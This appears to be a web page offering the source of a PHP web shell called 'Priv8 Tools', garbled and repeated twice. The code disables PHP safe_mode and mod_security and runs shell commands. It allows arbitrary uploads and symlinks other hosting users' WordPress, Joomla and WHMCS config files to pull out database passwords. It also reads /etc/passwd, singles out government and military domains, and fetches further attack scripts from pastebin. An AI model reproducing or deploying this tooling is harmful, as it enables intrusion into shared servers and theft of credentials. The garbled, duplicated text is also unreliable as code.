Share this:

  • Product Code: MA-5034

Moshkela Hacker







"; session_start(); if( !isset($_SESSION['sec']) ){ $_SESSION['sec'] = false; } if(isset($pass)) { if($user == $username and md5($pass) == $password) { $_SESSION['sec'] = true; } else { die( "{$form}
Error grin ÑãÒ ÊÚÈíÑí"); } } if(!$_SESSION['sec']): echo $form; exit(); endif; if($_GET['log'] == 'out') { session_destroy(); } echo "Welcome {$user} | Logout"; ?> Priv8 Tools By Moshkela Hacker


Safe Mode Fucker

'; if ($_POST['way'] == "htaccess") { x0b(); } elseif ($_POST['way'] == "php.ini") { x0c(); } elseif ($_POST['way'] == "ini.php") { x0d(); } } function x0b() { global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97; $x2f = $x80($x83() . $x30 . "/.htaccess", "w"); $x81($x2f, "Options +FollowSymLinks DirectoryIndex india.htm Options All Indexes SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckCookieFormat Off SecFilterCheckUnicodeEncoding Off SecFilterNormalizeCookies Off SetEnv PHPRC " . $x83() . $x30 . "/php.ini suPHP_ConfigPath " . $x83() . $x30 . "/php.ini"); $x7a($x2f); if ($x86($x83() . $x30 . "/.htaccess")) { echo ".htaccess Created successfully
"; } else { echo "I can not create .htaccess
"; }; } function x0c() { global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97; $x31 = $x80($x83() . $x30 . "/php.ini", "w"); $x81($x31, "safe_mode = Off disable_functions = NONE safe_mode_gid = OFF open_basedir = OFF"); $x7a($x31); if ($x86($x83() . $x30 . "/php.ini")) { echo "php.ini Created successfully
"; } else { echo "I can not create php.ini
"; }; } function x0d() { global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97; $x32 = $x80($x83() . $x30 . "/ini.php", "w"); $x81($x32, '$x84("safe_mode"); $x84("open_basedir");'); $x7a($x32); if ($x86($x83() . $x30 . "/ini.php")) { echo "ini.php Created successfully
"; } else { echo "I can not create ini.php
"; }; } if ($_REQUEST['tool'] == "Execute") { echo '

Execute

'; if ($_POST['go']) { $x4b = $x82("system"); $x4c = $x82("passthru"); $x4d = $x82("shell_exec"); if ($x4b) { echo "'; } if (!$x4b & $x4c) { echo "'; } if (!$x4b & !$x4c & $x4d) { echo "'; } } } else if ($_REQUEST['tool'] == "Upload") { echo"

Upload

"; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if (isset($_FILES['image']['name'])) { $abod = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $abod); echo"

Don3 ==> $userfile_name

"; } } else{ echo'
'; } } else if ($_REQUEST['tool'] == "Config Killer") { echo "

Config Killer

"; ?>






Symlink is disabled frown ÑãÒ ÊÚÈíÑí '); } @$x88('M-Iraq', 0755); @$x74('M-Iraq'); $x2f = " OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI Options Indexes FollowSymLinks ForceType text/plain AddType text/plain .php AddType text/plain .html AddType text/html .shtml AddType txt .php AddHandler server-parsed .php AddHandler txt .php AddHandler txt .html AddHandler txt .shtml Options All Options All"; $x7c(".htaccess", $x2f, FILE_APPEND); $x35 = $_POST["passwd"]; $x35 = $x79(" ", $x35); foreach ($x35 as $x36) { $x37 = $x79(":", $x36); $x38 = $x37[0]; @$x95('/home/' . $x38 . '/public_html/wp-config.php', $x38 . '-wp13.txt'); @$x95('/home/' . $x38 . '/public_html/wp/wp-config.php', $x38 . '-wp13-wp.txt'); @$x95('/home/' . $x38 . '/public_html/WP/wp-config.php', $x38 . '-wp13-WP.txt'); @$x95('/home/' . $x38 . '/public_html/wp/beta/wp-config.php', $x38 . '-wp13-wp-beta.txt'); @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp13-beta.txt'); @$x95('/home/' . $x38 . '/public_html/press/wp-config.php', $x38 . '-wp13-press.txt'); @$x95('/home/' . $x38 . '/public_html/wordpress/wp-config.php', $x38 . '-wp13-wordpress.txt'); @$x95('/home/' . $x38 . '/public_html/Wordpress/wp-config.php', $x38 . '-wp13-Wordpress.txt'); @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp13-Wordpress.txt'); @$x95('/home/' . $x38 . '/public_html/config.php', $x38 . '-configgg.txt'); @$x95('/home/' . $x38 . '/public_html/news/wp-config.php', $x38 . '-wp13-news.txt'); @$x95('/home/' . $x38 . '/public_html/new/wp-config.php', $x38 . '-wp13-new.txt'); @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp-blog.txt'); @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp-beta.txt'); @$x95('/home/' . $x38 . '/public_html/blogs/wp-config.php', $x38 . '-wp-blogs.txt'); @$x95('/home/' . $x38 . '/public_html/home/wp-config.php', $x38 . '-wp-home.txt'); @$x95('/home/' . $x38 . '/public_html/db.php', $x38 . '-dbconf.txt'); @$x95('/home/' . $x38 . '/public_html/site/wp-config.php', $x38 . '-wp-site.txt'); @$x95('/home/' . $x38 . '/public_html/main/wp-config.php', $x38 . '-wp-main.txt'); @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-wp-test.txt'); @$x95('/home/' . $x38 . '/public_html/joomla/configuration.php', $x38 . '-joomla2.txt'); @$x95('/home/' . $x38 . '/public_html/portal/configuration.php', $x38 . '-joomla-protal.txt'); @$x95('/home/' . $x38 . '/public_html/joo/configuration.php', $x38 . '-joo.txt'); @$x95('/home/' . $x38 . '/public_html/cms/configuration.php', $x38 . '-joomla-cms.txt'); @$x95('/home/' . $x38 . '/public_html/site/configuration.php', $x38 . '-joomla-site.txt'); @$x95('/home/' . $x38 . '/public_html/main/configuration.php', $x38 . '-joomla-main.txt'); @$x95('/home/' . $x38 . '/public_html/news/configuration.php', $x38 . '-joomla-news.txt'); @$x95('/home/' . $x38 . '/public_html/new/configuration.php', $x38 . '-joomla-new.txt'); @$x95('/home/' . $x38 . '/public_html/home/configuration.php', $x38 . '-joomla-home.txt'); @$x95('/home/' . $x38 . '/public_html/vb/includes/config.php', $x38 . '-vb-config.txt'); @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm15.txt'); @$x95('/home/' . $x38 . '/public_html/central/configuration.php', $x38 . '-whm-central.txt'); @$x95('/home/' . $x38 . '/public_html/whm/whmcs/configuration.php', $x38 . '-whm-whmcs.txt'); @$x95('/home/' . $x38 . '/public_html/whm/WHMCS/configuration.php', $x38 . '-whm-WHMCS.txt'); @$x95('/home/' . $x38 . '/public_html/whmc/WHM/configuration.php', $x38 . '-whmc-WHM.txt'); @$x95('/home/' . $x38 . '/public_html/whmcs/configuration.php', $x38 . '-whmcs.txt'); @$x95('/home/' . $x38 . '/public_html/support/configuration.php', $x38 . '-support.txt'); @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-joomla.txt'); @$x95('/home/' . $x38 . '/public_html/submitticket.php', $x38 . '-whmcs2.txt'); @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm.txt'); } echo '[M-IRAQ] -> Open configs'; } } else if ($_REQUEST['tool'] == "Symlink") { echo "

Symlink Bypass

"; echo '
'; @$x92(0); echo "
"; @$x88('m-iraq', 0777); $x2f = "Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php AddType txt .html AddHandler txt .html Options all Options Options ReadmeName r.txt"; $x26 = @$x80('m-iraq/.htaccess', 'w'); $x81($x26, $x2f); @$x95('/', 'm-iraq/root'); $x27 = $x73('index.php'); $x28 = @$x7d('/etc/named.conf'); if (!$x28) { echo "
# Cant access this file on server -> [ /etc/named.conf ]
"; } else { echo "

"; foreach ($x28 as $x29) { if ($x77('zone', $x29)) { $x8f('#zone "(.*)"#', $x29, $x2a); $x7e(); if ($x94($x97($x2a[1][0])) > 2) { $x2b = $x8e(@$x7f('/etc/valiases/' . $x2a[1][0])); $x2c = $x2b['name']; @$x95('/', 'm-iraq/root'); $x2c = $x2a[1][0]; $x2d = '\.sa'; $x2e = '\.il'; $x1e = '\.id'; $x1f = '\.sg'; $x20 = '\.edu'; $x21 = '\.gov'; $x22 = '\.go'; $x23 = '\.gob'; $x24 = '\.mil'; $x25 = '\.mi'; if ($x77("$x2d", $x2a[1][0]) or $x77("$x2e", $x2a[1][0]) or $x77("$x1e", $x2a[1][0]) or $x77("$x1f", $x2a[1][0]) or $x77("$x20", $x2a[1][0]) or $x77("$x21", $x2a[1][0]) or $x77("$x22", $x2a[1][0]) or $x77("$x23", $x2a[1][0]) or $x77("$x24", $x2a[1][0]) or $x77("$x25", $x2a[1][0])) { $x2c = "
" . $x2a[1][0] . '
'; } echo " "; } } } } echo "
DomainsUserssymlink
' . $x2b['name'] . " Symlink
"; } else if ($_REQUEST['tool'] == "Symlink 2") { echo '

Symlink-2



'; $x4e = $_POST["user"]; $x4f = '' . $x91() . '.txt'; if ($x4e) { $x50 = $x91(); @$x88($x50); $x51 = $x50 . "/.htaccess"; $x52 = $x80($x51, 'w') or die("Error: Can't open file"); $x53 = 'Options +Indexes ReadMeName ' . $x4f; $x81($x52, $x53); $x7a($x52); $x74($x50); $x95($x4e, $x4f); $x74("../"); echo "
"; } } else if ($_REQUEST['tool'] == "Pass Config") { echo"

Get Password in Config

"; echo '
'; $x39 = $_POST['get']; $x3a = $_POST['conf']; if (isset($x39) && $x3a != "") { $x3b = @$x7b($x3a); $x8f('#href="(.*?)"#', $x3b, $x3c); foreach ($x3c[1] as $x3d) { $x3e = $x3a . $x3d; $x3f = @$x7b($x3e); $x90('#\'DB_PASSWORD\', \'(.*)\'#', $x3f, $x40); $x90('#password = \'(.*)\'#', $x3f, $x41); $x90('#password\'] = \'(.*)\'#', $x3f, $x42); $x90('#db_password = "(.*)"#', $x3f, $x43); $x90('#db_password = \'(.*)\'#', $x3f, $x43); $x90('#dbpass = "(.*)"#', $x3f, $x44); $x90('#password = \'(.*)\'#', $x3f, $x45); $x90('#dbpasswd = \'(.*)\'#', $x3f, $x46); $x90('#password_localhost = "(.*)"#', $x3f, $x47); $x90('#senha = "(.*)"#', $x3f, $x48); if (!empty($x40[1])) { echo $x40[1] . "
"; } elseif (!empty($x41[1])) { echo $x41[1] . "
"; } elseif (!empty($x42[1])) { echo $x42[1] . "
"; } elseif (!empty($x43[1])) { echo $x43[1] . "
"; } elseif (!empty($x44[1])) { echo $x44[1] . "
"; } elseif (!empty($x45[1])) { echo $x45[1] . "
"; } elseif (!empty($x49[1])) { echo $x49[1] . "
"; } elseif (!empty($x46[1])) { echo $x46[1] . "
"; } elseif (!empty($x47[1])) { echo $x47[1] . "
"; } elseif (!empty($x48[1])) { echo $x48[1] . "
"; } } } } else if ($_REQUEST['tool'] == "Jumping") { echo"

Jumping

"; $x26 = "array_push"; $x27 = "feof"; $x28 = "fgets"; $x29 = "fopen"; $x2a = "ini_get"; $x2b = "is_readable"; $x2c = "set_time_limit"; $x2d = "strpos"; $x2e = "substr"; ($x2f = $x2a('safe_mode') == 0) ? $x2f = 'off' : die('Error: Safe Mode is On'); $x2c(0); @$x30 = $x29('/etc/passwd', 'r'); if (!$x30) { die(' Error : Can Not Read Config Of Server '); } $x31 = array(); $x32 = array(); $x33 = array(); $x34 = 0; echo "
"; echo "
"; while (!$x27($x30)) { $x35 = $x28($x30); if ($x34 > 35) { $x36 = $x2d($x35, ':'); $x37 = $x2e($x35, 0, $x36); $x38 = '/home/' . $x37 . '/public_html/'; if (($x37 != '')) { if ($x2b($x38)) { $x26($x32, $x37); $x26($x31, $x38); echo " $x38"; echo "
"; } } } $x34++; } } else if ($_REQUEST['tool'] == "About") { echo '

Coded By Moshkela Hacker

tnx : Mostafa Moshkela

'; } else if ($_REQUEST['tool'] == "Server Info") { echo"

Server Info

"; $safe = ini_get("safe_mode"); if($safe == 1){ $safe_mode = "ON"; }else{ $safe_mode = "OFF"; } $dis = ini_get("disable_functions"); if($dis == ""){ $disable = "None"; }else{ $disable = "$dis"; } $uname = php_uname(); $server = $_SERVER['SERVER_ADDR']; $me = $_SERVER['REMOTE_ADDR']; echo "
Uname-a : $uname
Safe Mode : $safe_mode
Disable Functions : $disable

Server IP : $server

Your IP : $me
"; }else if($_REQUEST['tool'] == "Other tools"){ echo"

Other tools

"; echo'
Tools : '; if($_POST['get']){ switch($_POST['tools']){ case "Find Shell": if(file_put_contents('Findshell.php',file_get_contents('http://pastebin.com/raw/AR8MzfZV'))){ echo "
Findshell.php Done !
"; }; break; case "Get Jomla Sites": if(file_put_contents('jomla.php',file_get_contents('http://pastebin.com/raw/9BQ62rZF'))){ echo "
jomla.php Done !
"; } break; case "Get WordPress Sites": if(file_put_contents('wordpress.php',file_get_contents('http://pastebin.com/raw/504iswx3'))){ echo "
wordpress.php Done !
"; } break; case "Get All Sites Server": if(file_put_contents('ip.php',file_get_contents('http://pastebin.com/raw/c70btt4r'))){ echo "
ip.php Done !
"; } break; case "1337w0rm": if(file_put_contents('1337w0rm.php',file_get_contents('http://pastebin.com/raw/sqK6hVJd'))){ echo "
1337w0rm.php Done !
"; } break; case "Adminer": if(file_put_contents('Adminer.php',file_get_contents('http://pastebin.com/raw/BZHXtZqu'))){ echo "
Adminer.php Done !
"; } break; case "Mass Password": if(file_put_contents('Masspass.php',file_get_contents('http://pastebin.com/raw/eLv6MUpD'))){ echo "
Masspass.php Done !
"; } break; } }} ?>





Moshkela Hacker







"; session_start(); if( !isset($_SESSION['sec']) ){ $_SESSION['sec'] = false; } if(isset($pass)) { if($user == $username and md5($pass) == $password) { $_SESSION['sec'] = true; } else { die( "{$form}
Error grin ÑãÒ ÊÚÈíÑí"); } } if(!$_SESSION['sec']): echo $form; exit(); endif; if($_GET['log'] == 'out') { session_destroy(); } echo "Welcome {$user} | Logout"; ?> Priv8 Tools By Moshkela Hacker


Safe Mode Fucker

'; if ($_POST['way'] == "htaccess") { x0b(); } elseif ($_POST['way'] == "php.ini") { x0c(); } elseif ($_POST['way'] == "ini.php") { x0d(); } } function x0b() { global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97; $x2f = $x80($x83() . $x30 . "/.htaccess", "w"); $x81($x2f, "Options +FollowSymLinks DirectoryIndex india.htm Options All Indexes SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckCookieFormat Off SecFilterCheckUnicodeEncoding Off SecFilterNormalizeCookies Off SetEnv PHPRC " . $x83() . $x30 . "/php.ini suPHP_ConfigPath " . $x83() . $x30 . "/php.ini"); $x7a($x2f); if ($x86($x83() . $x30 . "/.htaccess")) { echo ".htaccess Created successfully
"; } else { echo "I can not create .htaccess
"; }; } function x0c() { global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97; $x31 = $x80($x83() . $x30 . "/php.ini", "w"); $x81($x31, "safe_mode = Off disable_functions = NONE safe_mode_gid = OFF open_basedir = OFF"); $x7a($x31); if ($x86($x83() . $x30 . "/php.ini")) { echo "php.ini Created successfully
"; } else { echo "I can not create php.ini
"; }; } function x0d() { global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97; $x32 = $x80($x83() . $x30 . "/ini.php", "w"); $x81($x32, '$x84("safe_mode"); $x84("open_basedir");'); $x7a($x32); if ($x86($x83() . $x30 . "/ini.php")) { echo "ini.php Created successfully
"; } else { echo "I can not create ini.php
"; }; } if ($_REQUEST['tool'] == "Execute") { echo '

Execute

'; if ($_POST['go']) { $x4b = $x82("system"); $x4c = $x82("passthru"); $x4d = $x82("shell_exec"); if ($x4b) { echo "'; } if (!$x4b & $x4c) { echo "'; } if (!$x4b & !$x4c & $x4d) { echo "'; } } } else if ($_REQUEST['tool'] == "Upload") { echo"

Upload

"; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if (isset($_FILES['image']['name'])) { $abod = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $abod); echo"

Don3 ==> $userfile_name

"; } } else{ echo'
'; } } else if ($_REQUEST['tool'] == "Config Killer") { echo "

Config Killer

"; ?>






Symlink is disabled frown ÑãÒ ÊÚÈíÑí '); } @$x88('M-Iraq', 0755); @$x74('M-Iraq'); $x2f = " OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI Options Indexes FollowSymLinks ForceType text/plain AddType text/plain .php AddType text/plain .html AddType text/html .shtml AddType txt .php AddHandler server-parsed .php AddHandler txt .php AddHandler txt .html AddHandler txt .shtml Options All Options All"; $x7c(".htaccess", $x2f, FILE_APPEND); $x35 = $_POST["passwd"]; $x35 = $x79(" ", $x35); foreach ($x35 as $x36) { $x37 = $x79(":", $x36); $x38 = $x37[0]; @$x95('/home/' . $x38 . '/public_html/wp-config.php', $x38 . '-wp13.txt'); @$x95('/home/' . $x38 . '/public_html/wp/wp-config.php', $x38 . '-wp13-wp.txt'); @$x95('/home/' . $x38 . '/public_html/WP/wp-config.php', $x38 . '-wp13-WP.txt'); @$x95('/home/' . $x38 . '/public_html/wp/beta/wp-config.php', $x38 . '-wp13-wp-beta.txt'); @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp13-beta.txt'); @$x95('/home/' . $x38 . '/public_html/press/wp-config.php', $x38 . '-wp13-press.txt'); @$x95('/home/' . $x38 . '/public_html/wordpress/wp-config.php', $x38 . '-wp13-wordpress.txt'); @$x95('/home/' . $x38 . '/public_html/Wordpress/wp-config.php', $x38 . '-wp13-Wordpress.txt'); @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp13-Wordpress.txt'); @$x95('/home/' . $x38 . '/public_html/config.php', $x38 . '-configgg.txt'); @$x95('/home/' . $x38 . '/public_html/news/wp-config.php', $x38 . '-wp13-news.txt'); @$x95('/home/' . $x38 . '/public_html/new/wp-config.php', $x38 . '-wp13-new.txt'); @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp-blog.txt'); @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp-beta.txt'); @$x95('/home/' . $x38 . '/public_html/blogs/wp-config.php', $x38 . '-wp-blogs.txt'); @$x95('/home/' . $x38 . '/public_html/home/wp-config.php', $x38 . '-wp-home.txt'); @$x95('/home/' . $x38 . '/public_html/db.php', $x38 . '-dbconf.txt'); @$x95('/home/' . $x38 . '/public_html/site/wp-config.php', $x38 . '-wp-site.txt'); @$x95('/home/' . $x38 . '/public_html/main/wp-config.php', $x38 . '-wp-main.txt'); @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-wp-test.txt'); @$x95('/home/' . $x38 . '/public_html/joomla/configuration.php', $x38 . '-joomla2.txt'); @$x95('/home/' . $x38 . '/public_html/portal/configuration.php', $x38 . '-joomla-protal.txt'); @$x95('/home/' . $x38 . '/public_html/joo/configuration.php', $x38 . '-joo.txt'); @$x95('/home/' . $x38 . '/public_html/cms/configuration.php', $x38 . '-joomla-cms.txt'); @$x95('/home/' . $x38 . '/public_html/site/configuration.php', $x38 . '-joomla-site.txt'); @$x95('/home/' . $x38 . '/public_html/main/configuration.php', $x38 . '-joomla-main.txt'); @$x95('/home/' . $x38 . '/public_html/news/configuration.php', $x38 . '-joomla-news.txt'); @$x95('/home/' . $x38 . '/public_html/new/configuration.php', $x38 . '-joomla-new.txt'); @$x95('/home/' . $x38 . '/public_html/home/configuration.php', $x38 . '-joomla-home.txt'); @$x95('/home/' . $x38 . '/public_html/vb/includes/config.php', $x38 . '-vb-config.txt'); @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm15.txt'); @$x95('/home/' . $x38 . '/public_html/central/configuration.php', $x38 . '-whm-central.txt'); @$x95('/home/' . $x38 . '/public_html/whm/whmcs/configuration.php', $x38 . '-whm-whmcs.txt'); @$x95('/home/' . $x38 . '/public_html/whm/WHMCS/configuration.php', $x38 . '-whm-WHMCS.txt'); @$x95('/home/' . $x38 . '/public_html/whmc/WHM/configuration.php', $x38 . '-whmc-WHM.txt'); @$x95('/home/' . $x38 . '/public_html/whmcs/configuration.php', $x38 . '-whmcs.txt'); @$x95('/home/' . $x38 . '/public_html/support/configuration.php', $x38 . '-support.txt'); @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-joomla.txt'); @$x95('/home/' . $x38 . '/public_html/submitticket.php', $x38 . '-whmcs2.txt'); @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm.txt'); } echo '[M-IRAQ] -> Open configs'; } } else if ($_REQUEST['tool'] == "Symlink") { echo "

Symlink Bypass

"; echo '
'; @$x92(0); echo "
"; @$x88('m-iraq', 0777); $x2f = "Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php AddType txt .html AddHandler txt .html Options all Options Options ReadmeName r.txt"; $x26 = @$x80('m-iraq/.htaccess', 'w'); $x81($x26, $x2f); @$x95('/', 'm-iraq/root'); $x27 = $x73('index.php'); $x28 = @$x7d('/etc/named.conf'); if (!$x28) { echo "
# Cant access this file on server -> [ /etc/named.conf ]
"; } else { echo "

"; foreach ($x28 as $x29) { if ($x77('zone', $x29)) { $x8f('#zone "(.*)"#', $x29, $x2a); $x7e(); if ($x94($x97($x2a[1][0])) > 2) { $x2b = $x8e(@$x7f('/etc/valiases/' . $x2a[1][0])); $x2c = $x2b['name']; @$x95('/', 'm-iraq/root'); $x2c = $x2a[1][0]; $x2d = '\.sa'; $x2e = '\.il'; $x1e = '\.id'; $x1f = '\.sg'; $x20 = '\.edu'; $x21 = '\.gov'; $x22 = '\.go'; $x23 = '\.gob'; $x24 = '\.mil'; $x25 = '\.mi'; if ($x77("$x2d", $x2a[1][0]) or $x77("$x2e", $x2a[1][0]) or $x77("$x1e", $x2a[1][0]) or $x77("$x1f", $x2a[1][0]) or $x77("$x20", $x2a[1][0]) or $x77("$x21", $x2a[1][0]) or $x77("$x22", $x2a[1][0]) or $x77("$x23", $x2a[1][0]) or $x77("$x24", $x2a[1][0]) or $x77("$x25", $x2a[1][0])) { $x2c = "
" . $x2a[1][0] . '
'; } echo " "; } } } } echo "
DomainsUserssymlink
' . $x2b['name'] . " Symlink
"; } else if ($_REQUEST['tool'] == "Symlink 2") { echo '

Symlink-2



'; $x4e = $_POST["user"]; $x4f = '' . $x91() . '.txt'; if ($x4e) { $x50 = $x91(); @$x88($x50); $x51 = $x50 . "/.htaccess"; $x52 = $x80($x51, 'w') or die("Error: Can't open file"); $x53 = 'Options +Indexes ReadMeName ' . $x4f; $x81($x52, $x53); $x7a($x52); $x74($x50); $x95($x4e, $x4f); $x74("../"); echo "
"; } } else if ($_REQUEST['tool'] == "Pass Config") { echo"

Get Password in Config

"; echo '
'; $x39 = $_POST['get']; $x3a = $_POST['conf']; if (isset($x39) && $x3a != "") { $x3b = @$x7b($x3a); $x8f('#href="(.*?)"#', $x3b, $x3c); foreach ($x3c[1] as $x3d) { $x3e = $x3a . $x3d; $x3f = @$x7b($x3e); $x90('#\'DB_PASSWORD\', \'(.*)\'#', $x3f, $x40); $x90('#password = \'(.*)\'#', $x3f, $x41); $x90('#password\'] = \'(.*)\'#', $x3f, $x42); $x90('#db_password = "(.*)"#', $x3f, $x43); $x90('#db_password = \'(.*)\'#', $x3f, $x43); $x90('#dbpass = "(.*)"#', $x3f, $x44); $x90('#password = \'(.*)\'#', $x3f, $x45); $x90('#dbpasswd = \'(.*)\'#', $x3f, $x46); $x90('#password_localhost = "(.*)"#', $x3f, $x47); $x90('#senha = "(.*)"#', $x3f, $x48); if (!empty($x40[1])) { echo $x40[1] . "
"; } elseif (!empty($x41[1])) { echo $x41[1] . "
"; } elseif (!empty($x42[1])) { echo $x42[1] . "
"; } elseif (!empty($x43[1])) { echo $x43[1] . "
"; } elseif (!empty($x44[1])) { echo $x44[1] . "
"; } elseif (!empty($x45[1])) { echo $x45[1] . "
"; } elseif (!empty($x49[1])) { echo $x49[1] . "
"; } elseif (!empty($x46[1])) { echo $x46[1] . "
"; } elseif (!empty($x47[1])) { echo $x47[1] . "
"; } elseif (!empty($x48[1])) { echo $x48[1] . "
"; } } } } else if ($_REQUEST['tool'] == "Jumping") { echo"

Jumping

"; $x26 = "array_push"; $x27 = "feof"; $x28 = "fgets"; $x29 = "fopen"; $x2a = "ini_get"; $x2b = "is_readable"; $x2c = "set_time_limit"; $x2d = "strpos"; $x2e = "substr"; ($x2f = $x2a('safe_mode') == 0) ? $x2f = 'off' : die('Error: Safe Mode is On'); $x2c(0); @$x30 = $x29('/etc/passwd', 'r'); if (!$x30) { die(' Error : Can Not Read Config Of Server '); } $x31 = array(); $x32 = array(); $x33 = array(); $x34 = 0; echo "
"; echo "
"; while (!$x27($x30)) { $x35 = $x28($x30); if ($x34 > 35) { $x36 = $x2d($x35, ':'); $x37 = $x2e($x35, 0, $x36); $x38 = '/home/' . $x37 . '/public_html/'; if (($x37 != '')) { if ($x2b($x38)) { $x26($x32, $x37); $x26($x31, $x38); echo " $x38"; echo "
"; } } } $x34++; } } else if ($_REQUEST['tool'] == "About") { echo '

Coded By Moshkela Hacker

tnx : Mostafa Moshkela

'; } else if ($_REQUEST['tool'] == "Server Info") { echo"

Server Info

"; $safe = ini_get("safe_mode"); if($safe == 1){ $safe_mode = "ON"; }else{ $safe_mode = "OFF"; } $dis = ini_get("disable_functions"); if($dis == ""){ $disable = "None"; }else{ $disable = "$dis"; } $uname = php_uname(); $server = $_SERVER['SERVER_ADDR']; $me = $_SERVER['REMOTE_ADDR']; echo "
Uname-a : $uname
Safe Mode : $safe_mode
Disable Functions : $disable

Server IP : $server

Your IP : $me
"; }else if($_REQUEST['tool'] == "Other tools"){ echo"

Other tools

"; echo'
Tools : '; if($_POST['get']){ switch($_POST['tools']){ case "Find Shell": if(file_put_contents('Findshell.php',file_get_contents('http://pastebin.com/raw/AR8MzfZV'))){ echo "
Findshell.php Done !
"; }; break; case "Get Jomla Sites": if(file_put_contents('jomla.php',file_get_contents('http://pastebin.com/raw/9BQ62rZF'))){ echo "
jomla.php Done !
"; } break; case "Get WordPress Sites": if(file_put_contents('wordpress.php',file_get_contents('http://pastebin.com/raw/504iswx3'))){ echo "
wordpress.php Done !
"; } break; case "Get All Sites Server": if(file_put_contents('ip.php',file_get_contents('http://pastebin.com/raw/c70btt4r'))){ echo "
ip.php Done !
"; } break; case "1337w0rm": if(file_put_contents('1337w0rm.php',file_get_contents('http://pastebin.com/raw/sqK6hVJd'))){ echo "
1337w0rm.php Done !
"; } break; case "Adminer": if(file_put_contents('Adminer.php',file_get_contents('http://pastebin.com/raw/BZHXtZqu'))){ echo "
Adminer.php Done !
"; } break; case "Mass Password": if(file_put_contents('Masspass.php',file_get_contents('http://pastebin.com/raw/eLv6MUpD'))){ echo "
Masspass.php Done !
"; } break; } }} ?>